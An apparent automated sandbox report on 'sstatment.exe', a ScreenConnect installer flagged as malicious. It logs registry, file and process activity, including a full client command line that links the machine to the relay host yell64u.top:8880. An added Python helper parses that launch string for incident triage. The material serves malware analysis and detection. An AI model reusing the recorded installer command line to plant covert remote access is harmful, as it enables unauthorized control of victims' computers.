Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnect
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnect
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnect
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnect
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnect
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnectJump to behavior

System Summary

Source: sstatment.exe | PE Signature Subject Chain: CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Code function 7_2_05350270: CreateProcessAsUserW
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\5e3176.msi
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\inprogressinstallinfo.ipi
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\SourceHash{4904E32F-1F5B-2CE5-B18E-779BCD958764}
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI3407.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI3417.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI367A.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\5e3178.msi (2 entries)
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\{4904E32F-1F5B-2CE5-B18E-779BCD958764}
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\{4904E32F-1F5B-2CE5-B18E-779BCD958764}\DefaultIcon
Source: C:\Windows\SysWOW64\msiexec.exe | File created: C:\Windows\Installer\wix{4904E32F-1F5B-2CE5-B18E-779BCD958764}.SchedServiceConfig.rmi
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (de5851ad6e374ce3)
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (de5851ad6e374ce3)\ty2tyxrw.tmp
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (de5851ad6e374ce3)\ty2tyxrw.newcfg
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log
Source: C:\Windows\System32\msiexec.exe | File deleted: C:\Windows\Installer\MSI3417.tmp
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Code function: 8_2_00007FFD9B4170BA
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Code function: 8_2_00007FFD9B421F32
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Code function: 8_2_00007FFD9B4110CF
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Code function: 8_2_00007FFD9B4110D7
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Code function: 8_2_00007FFD9B725BC1
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Code function: 8_2_00007FFD9B726283
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Code function: 8_2_00007FFD9B725DD4
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Code function: 8_2_00007FFD9B722932
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Code function: 8_2_00007FFD9B726809
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Code function: 8_2_00007FFD9B725C6A
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Code function: 9_2_00007FFD9B3F10D7
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Code function: 9_2_00007FFD9B3F10CF
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Code function: 9_2_00007FFD9B705BC6
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Code function: 9_2_00007FFD9B70E386
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Code function: 9_2_00007FFD9B7003FA
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Code function: 9_2_00007FFD9B706DFB
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Code function: 9_2_00007FFD9B70F132
Source: sstatment.exe | Static PE information: five resources named FILES, each a PE32 Mono/.Net assembly for MS Windows (three "executable (DLL) (console) Intel 80386", two "executable (GUI) Intel 80386")
Source: sstatment.exe, 00000000.00000002.1719196628.0000000007A05000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename wixca.dll (vs. sstatment.exe)
Source: sstatment.exe, 00000000.00000002.1709255979.0000000005090000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilename ScreenConnect.WindowsInstaller.dll (vs. sstatment.exe)
Source: sstatment.exe, 00000000.00000002.1713238462.00000000052E0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory strings: OriginalFilename libwebp.dll, zlib.dll, ScreenConnect.Windows.dll (vs. sstatment.exe)
Source: sstatment.exe, 00000000.00000002.1710557527.0000000005250000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilename ScreenConnect.Core.dll (vs. sstatment.exe)
Source: sstatment.exe, 00000000.00000002.1705736414.0000000003CB3000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename ScreenConnect.Windows.dll (vs. sstatment.exe)
Source: sstatment.exe, 00000000.00000000.1692726837.0000000000F3F000.00000002.00000001.01000000.00000003.sdmp | Binary or memory strings: OriginalFilename ScreenConnect.ClientInstallerRunner.exe, DotNetResolver.exe (vs. sstatment.exe)
Source: sstatment.exe, 00000000.00000002.1716168698.000000000569C000.00000004.08000000.00040000.00000000.sdmp | Binary or memory strings: OriginalFilename ScreenConnect.InstallerActions.dll, SfxCA.dll, wixca.dll, ScreenConnect.ClientInstallerRunner.exe (vs. sstatment.exe)
Source: sstatment.exe, 00000000.00000000.1692726837.0000000000A16000.00000002.00000001.01000000.00000003.sdmp | Binary or memory strings: OriginalFilename ScreenConnect.Core.dll, libwebp.dll, zlib.dll, ScreenConnect.Windows.dll, ScreenConnect.WindowsInstaller.dll (vs. sstatment.exe)
Source: sstatment.exe, 00000000.00000002.1709040207.0000000005050000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilename DotNetResolver.exe (vs. sstatment.exe)
Source: sstatment.exe | Binary or memory strings: OriginalFilename ScreenConnect.Core.dll, libwebp.dll, zlib.dll, ScreenConnect.Windows.dll, ScreenConnect.WindowsInstaller.dll, ScreenConnect.InstallerActions.dll, SfxCA.dll, wixca.dll, ScreenConnect.ClientInstallerRunner.exe, DotNetResolver.exe (vs. sstatment.exe)
Source: sstatment.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 0.2.sstatment.exe.52e0000.5.raw.unpack, WindowsToolkit.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.sstatment.exe.a9c3d8.3.raw.unpack, WindowsToolkit.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.sstatment.exe.5250000.2.raw.unpack, CursorBuffer.cs | Cryptographic APIs: 'TransformBlock'
Source: 0.0.sstatment.exe.a163d8.5.raw.unpack, CursorBuffer.cs | Cryptographic APIs: 'TransformBlock'
Source: 0.2.sstatment.exe.52e0000.5.raw.unpack, WindowsExtensions.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.sstatment.exe.52e0000.5.raw.unpack, WindowsExtensions.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.sstatment.exe.52e0000.5.raw.unpack, WindowsExtensions.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.0.sstatment.exe.a9c3d8.3.raw.unpack, WindowsExtensions.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.0.sstatment.exe.a9c3d8.3.raw.unpack, WindowsExtensions.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.0.sstatment.exe.a9c3d8.3.raw.unpack, WindowsExtensions.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: classification engine | Classification label: mal42.evad.winEXE@17/56@1/1
Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)
Source: C:\Users\user\Desktop\sstatment.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\sstatment.exe.log
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | Mutant created: NULL
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Mutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
Source: C:\Users\user\Desktop\sstatment.exe | File created: C:\Users\user\AppData\Local\Temp\ScreenConnect
Source: sstatment.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: sstatment.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Users\user\Desktop\sstatment.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\sstatment.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI2C46.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6171828 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
Source: sstatment.exe | String found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2
Source: sstatment.exe | String found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2)
Source: C:\Users\user\Desktop\sstatment.exe | File read: C:\Users\user\Desktop\sstatment.exe
Source: unknown | Process created: C:\Users\user\Desktop\sstatment.exe "C:\Users\user\Desktop\sstatment.exe"
Source: C:\Users\user\Desktop\sstatment.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\de5851ad6e374ce3\setup.msi"
Source: unknown | Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 59D7E5A298D3BDCE75E1864C9D19AFAE C
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI2C46.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6171828 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 538DC24C91048081BEAA643BBADB9B49
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 03E219FD9DD5FBE89B8F3FB198F75C6D E Global\MSI0000
Source: unknown | Process created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=yell64u.top&p=8880&s=0a7ccdb4-25e1-42ac-b218-f258ea3dd8fe&k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA&c=PHP&c=&c=Sales&c=&c=&c=&c=&c="
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Process created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "fda0d9d1-006f-4842-aa6c-538f6b380dd3" "User"
Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe | Process created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "3ed7d239-c254-4fd8-943e-8cdfefb70c7f" "System"
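The ClientService.exe command line above carries everything an incident responder needs to attribute the install: the relay host and port (h=, p=), the session GUID (s=), the custom properties the operator typed into the installer (c=), and a URL-encoded, base64 CryptoAPI PUBLICKEYBLOB of the relay server (k=). The following Python is an added triage helper written for this report; it is not ScreenConnect or Joe Sandbox code. The field meanings are inferred from the sample (treat them as assumptions), the sample command line is the one recorded above, and the "expected" relay ports are an assumption based on ScreenConnect's documented default of 8041 plus 443; 8880 falls outside that set, which lines up with the "traffic on non-standard ports" signature.

```python
"""Parse a ScreenConnect client launch string and decode its embedded relay key.

Added example for this report; not ScreenConnect or Joe Sandbox code.  Field
semantics (e = session type, y = process type, h = relay host, p = relay port,
s = session id, k = CAPI PUBLICKEYBLOB of the relay, c = custom properties)
are inferred from the sample command line and should be treated as assumptions.
"""
import base64
import hashlib
import re
import struct
from urllib.parse import parse_qs

# Constructed sample: the ClientService.exe command line recorded in the report above.
SAMPLE_CMDLINE = (
    '"C:\\Program Files (x86)\\ScreenConnect Client (de5851ad6e374ce3)\\ScreenConnect.ClientService.exe" '
    '"?e=Access&y=Guest&h=yell64u.top&p=8880&s=0a7ccdb4-25e1-42ac-b218-f258ea3dd8fe'
    '&k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA'
    '&c=PHP&c=&c=Sales&c=&c=&c=&c=&c="'
)

# Assumption: 8041 is ScreenConnect's documented default relay port and 443 is the
# other value commonly seen; anything else is flagged for a closer look.
EXPECTED_RELAY_PORTS = {443, 8041}

PUBLICKEYBLOB = 0x06          # BLOBHEADER.bType for a public key
CALG_RSA_KEYX = 0x0000A400    # BLOBHEADER.aiKeyAlg for an RSA key-exchange key


def extract_launch_string(cmdline: str) -> str:
    """Return the quoted '?e=...' argument from a full process command line."""
    match = re.search(r'"(\?e=[^"]*)"', cmdline)
    if not match:
        raise ValueError("no ScreenConnect launch string in command line")
    return match.group(1)


def parse_capi_rsa_pubkey(blob: bytes) -> dict:
    """Decode a CryptoAPI PUBLICKEYBLOB: BLOBHEADER, RSAPUBKEY, little-endian modulus."""
    if len(blob) < 20:
        raise ValueError("blob too short for BLOBHEADER + RSAPUBKEY")
    b_type, b_version, _reserved, alg_id = struct.unpack_from("<BBHI", blob, 0)
    magic, bit_len, pub_exp = struct.unpack_from("<4sII", blob, 8)
    if b_type != PUBLICKEYBLOB or magic != b"RSA1" or alg_id != CALG_RSA_KEYX:
        raise ValueError(f"not an RSA PUBLICKEYBLOB (type={b_type:#x}, magic={magic!r}, alg={alg_id:#x})")
    modulus_le = blob[20:20 + bit_len // 8]
    return {
        "blob_version": b_version,
        "bits": bit_len,
        "exponent": pub_exp,
        "modulus": int.from_bytes(modulus_le, "little"),
        "modulus_bytes_present": len(modulus_le),
        # SHA-256 of the raw blob: a stable pivot for hunting other installers
        # that point at the same relay, regardless of host name or port.
        "blob_sha256": hashlib.sha256(blob).hexdigest(),
    }


def parse_launch_string(launch: str) -> dict:
    """Split the launch string into named relay parameters and decode the key."""
    fields = parse_qs(launch.lstrip("?"), keep_blank_values=True)
    first = lambda key: fields.get(key, [""])[0]
    key_b64 = first("k")
    # parse_qs has already URL-decoded %2f/%2b; tolerate missing base64 padding.
    blob = base64.b64decode(key_b64 + "=" * (-len(key_b64) % 4)) if key_b64 else b""
    port = int(first("p")) if first("p") else None
    return {
        "session_type": first("e"),
        "process_type": first("y"),
        "relay_host": first("h"),
        "relay_port": port,
        "session_id": first("s"),
        "custom_properties": fields.get("c", []),
        "relay_pubkey": parse_capi_rsa_pubkey(blob) if blob else None,
        "nonstandard_port": port is not None and port not in EXPECTED_RELAY_PORTS,
    }


def triage(cmdline: str) -> dict:
    """Full pipeline: process command line -> relay parameters."""
    return parse_launch_string(extract_launch_string(cmdline))


if __name__ == "__main__":
    info = triage(SAMPLE_CMDLINE)
    key = info.pop("relay_pubkey")
    for name, value in info.items():
        print(f"{name:>18}: {value}")
    print(f"{'relay key':>18}: RSA-{key['bits']} e={key['exponent']} blob sha256={key['blob_sha256']}")
```

Run over EDR process-creation telemetry, `triage()` turns every ScreenConnect install into a (relay host, port, session id, key fingerprint) tuple; the key fingerprint is the most durable of the four, since an operator can rotate domains and ports far more cheaply than the relay's RSA key. The decoder is strict about the BLOBHEADER so a truncated or non-RSA blob fails loudly instead of producing a misleading fingerprint.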
Source: C:\Users\user\Desktop\sstatment.exe | Sections loaded: apphelp.dll, mscoree.dll, kernel.appcore.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, wldp.dll, amsi.dll, userenv.dll, profapi.dll, version.dll, msasn1.dll, gpapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, uxtheme.dll, windows.storage.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Sections loaded (repeated entries collapsed): apphelp.dll, aclayers.dll, mpr.dll, sfc.dll, sfc_os.dll, msi.dll, srpapi.dll, kernel.appcore.dll, tsappcmp.dll, uxtheme.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll, windows.storage.dll, wldp.dll, propsys.dll, textshaping.dll, netapi32.dll, wkscli.dll, netutils.dll, version.dll, mscoree.dll, profapi.dll, sspicli.dll, msihnd.dll, pcacli.dll
Source: C:\Windows\System32\msiexec.exe | Sections loaded: apphelp.dll, aclayers.dll, sfc.dll, sfc_os.dll, kernel.appcore.dll, msi.dll, tsappcmp.dll, userenv.dll, profapi.dll, sspicli.dll, netapi32.dll, wkscli.dll, netutils.dll, srclient.dll, spp.dll, powrprof.dll, vssapi.dll, vsstrace.dll, umpdc.dll
                              Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cabinet.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: profapi.dllJump to behavior
